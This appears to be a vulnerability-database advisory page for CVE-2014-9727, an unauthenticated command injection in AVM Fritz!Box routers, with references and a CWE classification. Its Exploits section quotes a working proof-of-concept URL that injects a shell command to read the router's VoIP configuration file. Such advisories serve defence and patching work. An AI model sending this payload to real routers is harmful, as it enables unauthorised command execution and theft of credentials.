CVE-2014-9727
Severity: critical
CVSS v3: —
CVSS v4: —
VIR risk: 10.0
Description
AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm.
Predictions
Exploit likelihood: 20%
Patch ETA: —
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Fritz!Box - Remote Command Execution
App : Fritz!Box
Author : 0x4148
Fritz!Box is a networking/Voice over IP router produced by AVM. It suffers from an unauthenticated remote command execution flaw.
PoC:
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26
#0x4148_rise
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| avm | fritz!box | | |
References
- http://www.exploit-db.com/exploits/33136
- http://www.osvdb.org/103289
- https://www.trustwave.com/Resources/SpiderLabs-Blog/-Honeypot-Alert--Fritz%21Box-%E2%80%93-Remote-Command-Execution-Exploit-Attempt/
CWEs
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')